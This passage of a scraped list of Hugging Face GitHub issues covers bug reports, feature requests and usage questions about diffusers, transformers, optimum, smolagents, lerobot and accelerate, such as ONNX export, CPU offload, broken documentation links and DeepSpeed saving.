eps=1e-06)\r\n)\r\n```\r\n-> the language modeling head `lm_head` is gone. Is guess that's all expected (?) but I haven't found any documentation of this behaviour or where in the pipeline code this happens. \r\n\r\n### Reproduction\r\n\r\n```python\r\nimport torch\r\nfrom diffusers import BitsAndBytesConfig as DiffusersBitsAndBytesConfig, SanaTransformer2DModel, SanaPipeline\r\nfrom transformers import BitsAndBytesConfig as BitsAndBytesConfig, AutoModelForCausalLM\r\n\r\nquant_config = BitsAndBytesConfig(load_in_8bit=True)\r\ntext_encoder_8bit = AutoModelForCausalLM.from_pretrained(\r\n \"Efficient-Large-Model/Sana_600M_1024px_diffusers\",\r\n subfolder=\"text_encoder\",\r\n # quantization_config=quant_config,\r\n torch_dtype=torch.float16,\r\n)\r\n\r\nquant_config = DiffusersBitsAndBytesConfig(load_in_8bit=True)\r\ntransformer_8bit = SanaTransformer2DModel.from_pretrained(\r\n \"Efficient-Large-Model/Sana_600M_1024px_diffusers\",\r\n subfolder=\"transformer\",\r\n # quantization_config=quant_config,\r\n torch_dtype=torch.float16,\r\n)\r\n\r\npipeline = SanaPipeline.from_pretrained(\r\n \"Efficient-Large-Model/Sana_600M_1024px_diffusers\",\r\n text_encoder=text_encoder_8bit,\r\n transformer=transformer_8bit,\r\n torch_dtype=torch.float16,\r\n device_map=\"balanced\",\r\n)\r\n\r\nprompt = \"a tiny astronaut hatching from an egg on the moon\"\r\nimage = pipeline(prompt).images[0]\r\nimage.save(\"sana.png\")\r\n```\r\n\r\nLoading without `quantization_config` because for some reason this does not work on my mac but I tried the same code on a 4090 and it fails there too.\r\n\r\n### Logs\r\n\r\n```shell\r\n---------------------------------------------------------------------------\r\nRuntimeError Traceback (most recent call last)\r\nCell In[5], line 30\r\n ", "url": "https://github.com/huggingface/diffusers/issues/10489", "state": "closed", "labels": [ "bug" ], "created_at": "2025-01-07T17:14:27Z", "updated_at": "2025-01-08T05:18:05Z", "comments": 2, "user": "geronimi73" }, { "repo": "huggingface/distil-whisper", "number": 164, "title": "How to finetune distil-whisper/distil-large-v2 model?", "body": "How to finetune distil-whisper/distil-large-v2 model?", "url": "https://github.com/huggingface/distil-whisper/issues/164", "state": "open", "labels": [], "created_at": "2025-01-07T12:59:42Z", "updated_at": "2025-01-07T13:00:59Z", "user": "dhattareddy" }, { "repo": "huggingface/doc-builder", "number": 539, "title": "How to Deploy huggingface/doc-builder Artifacts to GitHub Pages?", "body": "Hi,\r\n\r\nI am currently working with the `huggingface/doc-builder` and I'm looking to deploy the generated documentation artifacts to GitHub Pages. Could you provide guidance or best practices on how to achieve this?\r\n\r\nSpecifically, I am interested in understanding:\r\n\r\n1. The steps required to configure the deployment process.\r\n2. Any necessary settings or configurations within GitHub Pages.\r\n3. Common pitfalls or issues to be aware of during deployment.\r\n\r\nThank you for your assistance!", "url": "https://github.com/huggingface/doc-builder/issues/539", "state": "open", "labels": [], "created_at": "2025-01-07T08:37:05Z", "updated_at": "2025-01-07T08:37:05Z", "user": "shunk031" }, { "repo": "huggingface/peft", "number": 2310, "title": "Comparison of Different Fine-Tuning Techniques for Conversational AI", "body": "### Feature request\n\nIt would be incredibly helpful to have a clear comparison or support for various fine-tuning techniques specifically for conversational AI. This feature could include insights into their strengths, limitations, and ideal use cases, helping practitioners choose the right approach for their needs.\r\n\r\nHere\u2019s a list of techniques to consider:\r\n\r\nLoRa\r\nAdaLoRa\r\nBONE\r\nVeRa\r\nXLora\r\nLN Tuning\r\nVbLora\r\nHRA (Hyperparameter Regularization Adapter)\r\nIA3 (Input-Aware Adapter)\r\nLlama Adapter\r\nCPT (Conditional Prompt Tuning)etc\n\n### Motivation\n\nWith the growing number of fine-tuning techniques for conversational AI, it can be challenging to identify the most suitable approach for specific use cases. A comprehensive comparison of these techniques\u2014highlighting their strengths, limitations, and ideal scenarios\u2014would save time, reduce trial-and-error, and empower users to make informed decisions. This feature would bridge the gap between research and practical application, enabling more effective model customization and deployment.\n\n### Your contribution\n\nI\u2019d be happy to collaborate on this! While I might not have a complete solution right now, I\u2019m willing to contribute by gathering resources, reviewing papers, or helping organize comparisons. If others are interested in teaming up, we could work together on a PR to make this feature happen. Let\u2019s connect and brainstorm how we can tackle this effectively! ", "url": "https://github.com/huggingface/peft/issues/2310", "state": "open", "labels": [ "good first issue", "help wanted", "contributions-welcome" ], "created_at": "2025-01-07T07:07:50Z", "updated_at": "2025-12-15T09:58:10Z", "comments": 44, "user": "ImamaDev" }, { "repo": "huggingface/smolagents", "number": 83, "title": "How to save/extract executed code", "body": "Is it possible to save the executed code? It's already in the log. It will be very useful.\r\nex.\r\n```\r\n\u256d\u2500 Executing this code: \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256e\r\n\u2502 1 attractions_list = [ \u2502\r\n\u2502 2 [\"Attraction\", \"Description\"], \u2502\r\n\u2502 3 [\"Sensoji Temple\", \"The oldest temple in Tokyo, offering beautiful architecture and a rich history.\"], \u2502\r\n\u2502 4 [\"Nakamise Shopping Street\", \"A historic shopping street with souvenirs and traditional snacks.\"], \u2502\r\n\u2502 5 [\"Kibi Dango\", \"A traditional rice cake snack available at Nakamise Street.\"], \u2502\r\n\u2502 6 [\"Asakusa Jinja\", \"A historic Shinto shrine that survived the bombings during WWII.\"], \u2502\r\n\u2502 7 [\"Kimono Experience\", \"Rent a kimono and walk around Asakusa.\"], \u2502\r\n\u2502 8 [\"Asakusa Culture Tourist Information Center\", \"A building with unique architecture, great for photos.\"], \u2502\r\n\u2502 9 [\"Tokyo Skytree\", \"The tallest structure in Tokyo, offering panoramic views.\"], \u2502\r\n\u2502 10 [\"Hanayashiki\", \"Japan\u2019s oldest amusement park with nostalgic charm.\"], \u2502\r\n\u2502 11 [\"Demboin Garden\", \"A serene Japanese garden adjacent to Sensoji Temple.\"], \u2502\r\n\u2502 12 [\"Azuma-bashi Bridge\", \"An iconic bridge offering views of the Tokyo Skytree.\"] \u2502\r\n\u2502 13 ] \u2502\r\n\u2502 14 \u2502\r\n\u2502 15 # Convert the list to CSV format (string) \u2502\r\n\u2502 16 csv_data = \"\\n\".join([\",\".join(row) for row in attractions_list]) \u2502\r\n\u2502 17 \u2502\r\n\u2502 18 # Save the CSV data to file \u2502\r\n\u2502 19 save_csv(data=csv_data, filename='asakusa_trip.csv') \u2502\r\n\u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f", "url": "https://github.com/huggingface/smolagents/issues/83", "state": "closed", "labels": [], "created_at": "2025-01-06T15:40:17Z", "updated_at": "2025-02-16T17:43:40Z", "user": "Lodimup" }, { "repo": "huggingface/diffusers", "number": 10475, "title": "[SD3]The quality of the images generated by the inference is not as high as on the validation set during fine-tuning?", "body": "### Describe the bug\n\nWhy is the quality of the graphs I generate with `StableDiffusion3Pipeline` not as good as the quality of the images in the validation set in the log generated when using dreambooth_lora for fine tuning?\r\nMaybe I need some other plugin or parameter setting to maintain the same image quality as the validation set?\n\n### Reproduction\n\n```\r\n# Here is my inference code:\r\n\r\nimport torch\r\nfrom diffusers import StableDiffusion3Pipeline\r\n\r\npipe = StableDiffusion3Pipeline.from_pretrained('./diffusers/stabilityai/stable-diffusion-3-medium-diffusers', torch_dtype=torch.float16).to('cuda')\r\npipe.load_lora_weights(\"./my_path/pytorch_lora_weights.safetensors\", adapter_name=\"test_lora\")\r\nimg = pipe(\r\n \"my prompt...\",\r\n generator=torch.manual_seed(1),\r\n num_inference_steps=40,\r\n guidance_scale=6\r\n).images[0].save('/root/my_img.png')\r\n```\n\n### Logs\n\n_No response_\n\n### System Info\n\nDiffuser Version: stable-diffusion-3-medium\r\nCUDA Version: 12.4\r\nGPU: NVIDIA A800 80GB\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/10475", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2025-01-06T14:52:57Z", "updated_at": "2025-02-06T12:17:47Z", "comments": 8, "user": "ytwo-hub" }, { "repo": "huggingface/datasets", "number": 7356, "title": "How about adding a feature to pass the key when performing map on DatasetDict?", "body": "### Feature request\n\nAdd a feature to pass the key of the DatasetDict when performing map\n\n### Motivation\n\nI often preprocess using map on DatasetDict. \r\nSometimes, I need to preprocess train and valid data differently depending on the task. \r\nSo, I thought it would be nice to pass the key (like train, valid) when performing map on DatasetDict. \r\n\r\nWhat do you think?\n\n### Your contribution\n\nI can submit a pull request to add the feature to pass the key of the DatasetDict when performing map.", "url": "https://github.com/huggingface/datasets/issues/7356", "state": "closed", "labels": [ "enhancement" ], "created_at": "2025-01-06T08:13:52Z", "updated_at": "2025-03-24T10:57:47Z", "user": "jp1924" }, { "repo": "huggingface/diffusers", "number": 10468, "title": "What is accelerate_ds2.yaml\uff1f", "body": "I can't find accelerate config file named \"accelerate_ds2.yaml\". \r\nPlease give me the file.\r\nThanks very much!", "url": "https://github.com/huggingface/diffusers/issues/10468", "state": "closed", "labels": [], "created_at": "2025-01-06T07:53:06Z", "updated_at": "2025-01-12T05:32:01Z", "user": "aa327chenge" }, { "repo": "huggingface/transformers", "number": 35523, "title": "How about adding a combined step and epoch feature to save_strategy?", "body": "### Feature request\n\nAdd epoch+steps functionality to save_strategy\n\n### Motivation\n\nI often set save_strategy to epoch for saving, but sometimes I need to run experiments with steps. \r\nRecently, I had to compare checkpoints saved at both epoch and step intervals, which required running the experiment twice and was quite cumbersome. Having a combined feature would be really helpful. What do you think?\n\n### Your contribution\n\nI can add the epoch+steps functionality to save_strategy.", "url": "https://github.com/huggingface/transformers/issues/35523", "state": "closed", "labels": [ "Feature request" ], "created_at": "2025-01-06T02:21:22Z", "updated_at": "2025-02-17T00:02:42Z", "user": "jp1924" }, { "repo": "huggingface/transformers", "number": 35512, "title": "Perhaps your features (`videos` in this case) have excessive nesting (inputs type `list` where type `int` is expected).", "body": "### System Info\n\nCopy-and-paste the text below in your GitHub issue and FILL OUT the two last points.\n\n- `transformers` version: 4.46.1\n- Platform: Linux-5.15.0-125-generic-x86_64-with-glibc2.35\n- Python version: 3.10.16\n- Huggingface_hub version: 0.27.0\n- Safetensors version: 0.4.5\n- Accelerate version: 1.0.1\n- Accelerate config: not found\n- PyTorch version (GPU?): 2.5.1+cu124 (True)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script?: \n- GPU type: NVIDIA GeForce RTX 4090\n\n### Who can help?\n\n@ArthurZucker \n\nclass BatchEncoding(UserDict):\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n```python\n [INST] What are the names of some famous actors that started their careers on Broadway? [/INST] Some famous actors that started their careers on Broad[78/1906]\nde: \n1. Hugh Jackman \n2. Meryl Streep \n3. Denzel Washington \n4. Julia Roberts \n5. Christopher Walken \n6. Anthony Rapp \n7. Audra McDonald \n8. Nathan Lane \n9. Sarah Jessica Parker \n10. Lin-Manuel Miranda \nlabel_ids: \n[-100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, -100, 2909, 8376, 16760, 369, \n2774, 652, 26072, 356, 24331, 3024, 28747, 28705, 13, 28740, 28723, 22389, 4299, 1294, 28705, 13, 28750, 28723, 351, 1193, 28714, 4589, 615, 28705, 13, 28770, 2872\n3, 4745, 10311, 5924, 28705, 13, 28781, 28723, 19526, 18021, 28705, 13, 28782, 28723, 17561, 9863, 269, 28705, 13, 28784, 28723, 15089, 399, 763, 28705, 13, 28787,\n 28723, 14421, 520, 25999, 28705, 13, 28783, 28723, 20514, 19029, 28705, 13, 28774, 28723, 12642, 24062, 19673, 28705, 13, 28740, 28734, 28723, 6678, 28733, 2356, \n3009, 9154, 5904, 2] \nlabels: \nSome famous actors that started their careers on Broadway include: \n1. Hugh Jackman \n2. Meryl Streep \n3. Denzel Washington \n4. Julia Roberts \n5. Christopher Walken ", "url": "https://github.com/huggingface/transformers/issues/35512", "state": "closed", "labels": [ "bug" ], "created_at": "2025-01-05T06:51:26Z", "updated_at": "2025-02-13T08:45:39Z", "user": "yxy-kunling" }, { "repo": "huggingface/diffusers", "number": 10452, "title": "pipe.disable_model_cpu_offload", "body": "**Is your feature request related to a problem? Please describe.**\r\n\r\nIf I enable the following in Gradio interface\r\nsana_pipe.enable_model_cpu_offload()\r\n\r\nand during next generation I want to disable cpu offload, how to do it? I mentioned Gradio specifically as command line inference will not have this problem unless after initializing pipe you generate multiple times with and without cpu offload.\r\n\r\nI already searched but nothing found\r\nhttps://github.com/search?q=repo%3Ahuggingface%2Fdiffusers%20disable_model_cpu_offload&type=code\r\n\r\n**Describe the solution you'd like.**\r\nAdd method to disable for \r\n1. enable_model_cpu_offload()\r\n2. enable_sequential_cpu_offload()\r\n\r\n**Describe alternatives you've considered.**\r\nI will have to delete the pipe completely and load again for each inference in Gradio UI\r\n\r\nKindly suggest if any alternative solution.\r\n\r\n\r\n```\r\nimport torch\r\nfrom diffusers import SanaPipeline\r\n\r\npipe = SanaPipeline.from_pretrained(\r\n\t\"Efficient-Large-Model/Sana_1600M_1024px_BF16_diffusers\", torch_dtype=torch.float32\r\n)\r\npipe.to(\"cuda\")\r\npipe.text_encoder.to(torch.bfloat16)\r\npipe.transformer = pipe.transformer.to(torch.bfloat16)\r\npipe.enable_model_cpu_offload()\r\n\r\nimage = pipe(prompt='a cyberpunk cat with a neon sign that says \"Sana\"')[0]\r\nimage[0].save(\"output.png\")\r\n\r\npipe.disable_model_cpu_offload()\r\nimage = pipe(prompt='a cyberpunk cat with a neon sign that says \"Sana 1\"')[0]\r\nimage[0].save(\"output1.png\")\r\n```\r\n\r\nP.S. How to delete a pipe completely so all models are removed completely and GPU memory is freed\r\nI did checked documentation but unable to find find anything relevant\r\nhttps://github.com/huggingface/diffusers/blob/main/src/diffusers/pipelines/sana/pipeline_sana.py\r\n\r\nhttps://github.com/huggingface/diffusers/blob/4e44534845d35248436abf87688906f52e71b868/src/diffusers/pipelines/pipeline_utils.py\r\n", "url": "https://github.com/huggingface/diffusers/issues/10452", "state": "closed", "labels": [], "created_at": "2025-01-04T16:39:01Z", "updated_at": "2025-01-07T08:29:32Z", "comments": 3, "user": "nitinmukesh" }, { "repo": "huggingface/diffusers", "number": 10448, "title": "Load DDUF file with Diffusers using mmap", "body": "DDUF support for diffusers is there and DDUF support mmap.\n\nBut diffusers example doesn't use or support mmap,\n\nHow can I load DDUF file to diffusers with mmap?\n\n```\nfrom diffusers import DiffusionPipeline\nimport torch\n\npipe = DiffusionPipeline.from_pretrained(\n \"DDUF/FLUX.1-dev-DDUF\", dduf_file=\"FLUX.1-dev.dduf\", torch_dtype=torch.bfloat16\n).to(\"cuda\")\nimage = pipe(\n \"photo a cat holding a sign that says Diffusers\", num_inference_steps=50, guidance_scale=3.5\n).images[0]\nimage.save(\"cat.png\")\n```", "url": "https://github.com/huggingface/diffusers/issues/10448", "state": "open", "labels": [ "stale" ], "created_at": "2025-01-04T00:42:09Z", "updated_at": "2025-02-03T15:02:46Z", "comments": 1, "user": "adhikjoshi" }, { "repo": "huggingface/lerobot", "number": 613, "title": "Starting off with pretrained models", "body": "Are there any pretrained models available that can be fine tuned using our own dataset for tasks like pick and place and manipulation? ", "url": "https://github.com/huggingface/lerobot/issues/613", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2025-01-03T21:09:40Z", "updated_at": "2025-10-08T20:53:09Z", "user": "rabhishek100" }, { "repo": "huggingface/optimum", "number": 2148, "title": "Support for Exporting Specific Sub-Modules (e.g., Encoder, Decoder)", "body": "### Feature request\n\nCurrently, when converting transformer models (like T5, but potentially others) to ONNX using the Optimum library, it appears to generate a single ONNX file encompassing the entire model architecture (both encoder and decoder). This occurs regardless of the specific task option selected during conversion.\r\n\r\n```\r\noptimum-cli export onnx --model . . --task text-classification\r\noptimum-cli export onnx --model . . --task feature-extraction \r\n```\r\nI propose a feature that provides users with more granular control over the ONNX export process. Specifically, this feature should allow users to selectively export specific sub-modules of a transformer model, such as:\r\n\r\n* Only the encoder\r\n* Only the decoder\r\n* Potentially other distinct components of the model\r\n\r\nThis enhancement would enable users to optimize ONNX models for specific use cases where only a portion of the full model is required. \r\nEvidence of the feasibility and need for this is the existence of separately exported encoder and decoder ONNX models for various transformer architectures on Hugging Face:\r\n- https://huggingface.co/dmmagdal/flan-t5-large-onnx-js/tree/main/onnx\r\n- https://huggingface.co/onnx-community/Florence-2-base-ft/tree/main/onnx\n\n### Motivation\n\nI am encountering a limitation with the current ONNX export functionality in Optimum. When converting transformer models, the resulting ONNX file invariably includes the entire model, even when I only require a specific part, like the encoder.\r\n\r\nThis is frustrating because:\r\n\r\n* **Increased Model Size:** The generated ONNX model is larger than necessary, consuming more storage and potentially impacting loading times.\r\n* **Performance Overhead:** When deploying the ONNX model for tasks that only utilize a specific sub-module (e.g., using only the encoder for embedding generation), the presence of the unnecessary decoder can introduce performance overhead.\r\n* **Lack of Flexibility:** The current approach lacks the flexibility to tailor the exported ONNX model to specific application needs.\r\n\r\nAs observed on Hugging Face, users have successfully exported individual components (like encoders and decoders) of various transformer models to ONNX. This indicates that it's technically possible and a desirable workflow. The Optimum library should provide a more direct and user-friendly way to achieve this without requiring manual workarounds.\n\n### Your contribution\n\nWhile my direct expertise in the internal workings of the Optimum library for ONNX export is limited, I am willing to contribute by:\r\n\r\n* **Testing:** Thoroughly testing any implementation of this feature on various transformer models.\r\n* **Providing Feedback:** Offering detailed feedback on the usability and effectiveness of the new feature.\r\n* **Sharing Use Cases:** Providing specific use cases and examples that highlight the benefits of this functionality.", "url": "https://github.com/huggingface/optimum/issues/2148", "state": "closed", "labels": [ "Stale" ], "created_at": "2025-01-03T14:48:36Z", "updated_at": "2025-04-08T02:09:03Z", "comments": 4, "user": "happyme531" }, { "repo": "huggingface/smolagents", "number": 52, "title": "How to implement human in the loop?", "body": "How to implement human in the loop?\r\n\r\nThere are two scenarios: one where more information and input from the user are required, and another where the user's consent is needed to perform a certain action.", "url": "https://github.com/huggingface/smolagents/issues/52", "state": "closed", "labels": [], "created_at": "2025-01-03T12:19:01Z", "updated_at": "2025-02-18T18:49:15Z", "user": "waderwu" }, { "repo": "huggingface/lerobot", "number": 611, "title": "Can ACT policy support pushT task?", "body": "I want to train the ACT policy with pushT dataset, but the evaluation accuracy is only 0%. \r\n![image](https://github.com/user-attachments/assets/12c4256a-98f9-4987-a1ab-b51ec230ba0b)\r\nHere is my yaml\r\n[act_pusht.txt](https://github.com/user-attachments/files/18299197/act_pusht.txt)\r\nAnd my training command is \r\n''\r\npython lerobot/scripts/train.py \\\r\n hydra.run.dir=outputs/train/2025_1_3_1654_act_pusht \\\r\n hydra.job.name=act_pusht \\\r\n policy=act_pusht \\\r\n policy.use_vae=true \\\r\n env=pusht \\\r\n env.task=PushT-v0 \\\r\n dataset_repo_id=lerobot/pusht \\\r\n training.offline_steps=50000 \\\r\n training.save_freq=25000 \\\r\n training.eval_freq=5000 \\\r\n eval.n_episodes=50 \\\r\n wandb.enable=false \\\r\n device=cuda\r\n''", "url": "https://github.com/huggingface/lerobot/issues/611", "state": "closed", "labels": [ "question", "policies", "stale" ], "created_at": "2025-01-03T11:30:40Z", "updated_at": "2025-10-19T02:32:28Z", "user": "Kimho666" }, { "repo": "huggingface/optimum", "number": 2147, "title": "Convert Stable Diffusion Inpainting model to FP16 with FP32 inputs", "body": "### Feature request\n\nI've used [this script](https://github.com/Amblyopius/Stable-Diffusion-ONNX-FP16/blob/main/conv_sd_to_onnx.py) to convert models to ONNX in FP16 format but maintaining the FP32 inputs. One of the models that I converted was [Stable Diffusion 2 Inpainting](https://huggingface.co/jdp8/sd-2-inpainting-fp16) to FP16 and tried to use it in ONNX Runtime and ONNX Runtime Web but it doesn't give me the expected results in either engine. I also converted [the model](https://huggingface.co/jdp8/optimum-sd-2-inpainting-onnx-fp32) with the Optimum conversion script to FP32 and this model gives me the expected result in ONNX Runtime. Results are shown below:\r\n\r\nInput Image:\r\n![inpaint](https://github.com/user-attachments/assets/751999a8-3814-40b9-a767-3717e9ea4b3e)\r\n\r\nMask Image:\r\n![inpaint_mask](https://github.com/user-attachments/assets/e421ca3b-0e0e-4050-b497-390abb399880)\r\n\r\nCorrect Onnx Runtime Output (converted with Optimum script):\r\n![onnx_cat](https://github.com/user-attachments/assets/48f4c713-5bae-42c5-ba2a-252655aca443)\r\n\r\nIncorrect Onnx Runtime Output (converted with Stable-Diffusion-ONNX-FP16 script):\r\n![onnx_cat_discolored](https://github.com/user-attachments/assets/f6c521d7-9f29-4bc9-88c6-297b4432e2f0)\r\n\r\nIncorrect Onnx Runtime Web Output (converted with Stable-Diffusion-ONNX-FP16 script):\r\n![Colorful_cat_picture](https://github.com/user-attachments/assets/2f8dcb2b-a4ba-450b-9761-2fac0da0f58c)\r\n\r\nI've also used the Optimum conversion script to convert the model to FP16 and this worked but the inputs are expected to be FP16. This datatype does not exist in JavaScript (specifically, `Float16Array`) and therefore cannot be used in ONNX Runtime Web. \r\n\r\nWith that being said, is it possible to convert a model to FP16 but leaving the inputs as FP32 in order for the UNET to be less than 2 GB?\n\n### Motivation\n\nI would like to run Stable Diffusion Inpainting in ONNX Runtime Web and for the UNET to be less than 2GB. The FP16 model that I have at the moment gives me an output that is not as expected in ONNX Runtime and ONNX Runtime Web. So far, only the Optimum models give me a correct output in ONNX Runtime but I would like to use this in ONNX Runtime Web.\n\n### Your contribution\n\nI am willing to contribute to this change given some guidance. Not sure how difficult it would be but I believe it would be similar to how it's implemented in [the script](https://github.com/Amblyopius/Stable-Diffusion-ONNX-FP16/blob/main/conv_sd_to_onnx.py) mentioned beforehand.", "url": "https://github.com/huggingface/optimum/issues/2147", "state": "closed", "labels": [], "created_at": "2025-01-02T21:28:43Z", "updated_at": "2025-01-25T00:15:54Z", "comments": 0, "user": "jdp8" }, { "repo": "huggingface/diffusers", "number": 10433, "title": "[Docs] Broken Links in a Section of Documentation", "body": "### Broken Links in a Section of Documentation\r\n>Make sure to check out the Schedulers [guide](../../using-diffusers/schedulers) to learn how to explore the tradeoff between scheduler speed and quality, and see the [reuse components across pipelines](../../using-diffusers/loading#reuse-a-pipeline) section to learn how to efficiently load the same components into multiple pipelines.\r\n\r\nIn this section of docs `reuse components across pipelines` link is broken or Not Directed to Proper Link\r\n\r\n`reuse components across pipelines` should be directed to [Reuse a pipeline](https://huggingface.co/docs/diffusers/en/using-diffusers/loading#reuse-a-pipeline) this section instead of [Load pipelines](https://huggingface.co/docs/diffusers/en/using-diffusers/loading#reuse-components-across-pipelines) section in following File.\r\n
\r\n In these docs\r\ndocs/source/en/api/pipelines/animatediff.md\r\n\r\ndocs/source/en/api/pipelines/attend_and_excite.md\r\ndocs/source/en/api/pipelines/audioldm.md\r\ndocs/source/en/api/pipelines/audioldm2.md\r\ndocs/source/en/api/pipelines/blip_diffusion.md\r\ndocs/source/en/api/pipelines/controlnet.md\r\ndocs/source/en/api/pipelines/controlnet_flux.md\r\ndocs/source/en/api/pipelines/controlnet_hunyuandit.md\r\ndocs/source/en/api/pipelines/controlnet_sd3.md\r\ndocs/source/en/api/pipelines/controlnet_sdxl.md\r\ndocs/source/en/api/pipelines/controlnetxs.md\r\ndocs/source/en/api/pipelines/controlnetxs_sdxl.md\r\ndocs/source/en/api/pipelines/dance_diffusion.md\r\ndocs/source/en/api/pipelines/ddpm.md\r\ndocs/source/en/api/pipelines/dit.md\r\ndocs/source/en/api/pipelines/i2vgenxl.md\r\ndocs/source/en/api/pipelines/kandinsky.md\r\ndocs/source/en/api/pipelines/kandinsky3.md\r\ndocs/source/en/api/pipelines/kandinsky_v22.md\r\ndocs/source/en/api/pipelines/latent_diffusion.md\r\ndocs/source/en/api/pipelines/marigold.md\r\ndocs/source/en/api/pipelines/musicldm.md\r\ndocs/source/en/api/pipelines/paint_by_example.md\r\ndocs/source/en/api/pipelines/panorama.md\r\ndocs/source/en/api/pipelines/pix2pix.md\r\ndocs/source/en/api/pipelines/self_attention_guidance.md\r\ndocs/source/en/api/pipelines/semantic_stable_diffusion.md\r\ndocs/source/en/api/pipelines/shap_e.md\r\ndocs/source/en/api/pipelines/stable_unclip.md\r\ndocs/source/en/api/pipelines/text_to_video.md\r\ndocs/source/en/api/pipelines/text_to_video_zero.md\r\ndocs/source/en/api/pipelines/unclip.md\r\ndocs/source/en/api/pipelines/unidiffuser.md\r\ndocs/source/en/api/pipelines/value_guided_sampling.md\r\n
\r\n\r\n---\r\n\r\n Some Links of `reuse components across pipelines` are broken in these files below.\r\n\r\n
\r\n In these docs\r\n docs/source/en/api/pipelines/allegro.md\r\n\r\n docs/source/en/api/pipelines/cogvideox.md\r\n docs/source/en/api/pipelines/latte.md\r\n docs/source/en/api/pipelines/ltx_video.md\r\n docs/source/en/api/pipelines/lumina.md\r\n docs/source/en/api/pipelines/pixart.md\r\n docs/source/en/api/pipelines/sana.md\r\n
\r\n\r\n\r\n---\r\n\r\n\r\n And `docs/source/en/api/pipelines/hunyuan_video.md` and `docs/source/en/api/pipelines/hunyuandit.md` are not in proper format\r\n@stevhliu ", "url": "https://github.com/huggingface/diffusers/issues/10433", "state": "closed", "labels": [], "created_at": "2025-01-02T18:24:44Z", "updated_at": "2025-01-06T18:07:39Z", "comments": 0, "user": "SahilCarterr" }, { "repo": "huggingface/transformers", "number": 35485, "title": " How to run the model on another machine and send the answer to another machine.", "body": "### System Info\n\ntransformers 4.31.0 , window os , python 3.10.12\n\n### Who can help?\n\nvision models: @amyeroberts, @qubvel\r\n\r\nI have tried using this model on my machine myself, and it works normally, but the processing is very slow because the GPU on my machine is not that powerful. However, I have a server with a strong GPU. If I install this model on the server and run the code on my machine, when it reaches the video processing stage, it sends the task to the server, and the server sends back the result. Then my machine will print the answer and display the result. Is this possible? If so, how can I do it?\r\n\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n.\n\n### Expected behavior\n\nI expect it to work in a hybrid way between my computer and the server to achieve faster results.", "url": "https://github.com/huggingface/transformers/issues/35485", "state": "closed", "labels": [ "bug" ], "created_at": "2025-01-02T10:03:42Z", "updated_at": "2025-01-07T10:20:46Z", "user": "ixn3rd3mxn" }, { "repo": "huggingface/accelerate", "number": 3320, "title": "How to save self-defined model with deepspeed zero 3?", "body": "### System Info\r\n\r\n```Shell\r\n- `Accelerate` version: 1.0.1\r\n- Python version: 3.10.0\r\n- Numpy version: 1.26.4\r\n- PyTorch version (GPU?): 2.5.1+cu124 (True)\r\n- PyTorch XPU available: False\r\n- PyTorch NPU available: False\r\n- PyTorch MLU available: False\r\n- PyTorch MUSA available: False\r\n- System RAM: 128.00 GB\r\n- GPU type: NVIDIA H20\r\n- `Accelerate` default config:\r\n - compute_environment: LOCAL_MACHINE\r\n - distributed_type: DEEPSPEED\r\n - mixed_precision: no\r\n - use_cpu: False\r\n - debug: False\r\n - num_processes: 4\r\n - machine_rank: 0\r\n - num_machines: 1\r\n - rdzv_backend: static\r\n - same_network: True\r\n - main_training_function: main\r\n - enable_cpu_affinity: False\r\n - deepspeed_config: {'gradient_accumulation_steps': 1, 'offload_optimizer_device': 'none', 'offload_param_device': 'none', 'zero3_init_flag': True, 'zero3_save_16bit_model': True, 'zero_stage': 3} \r\n - downcast_bf16: no\r\n - tpu_use_cluster: False\r\n - tpu_use_sudo: False\r\n - tpu_env: []\r\n```\r\n\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [X] My own modified 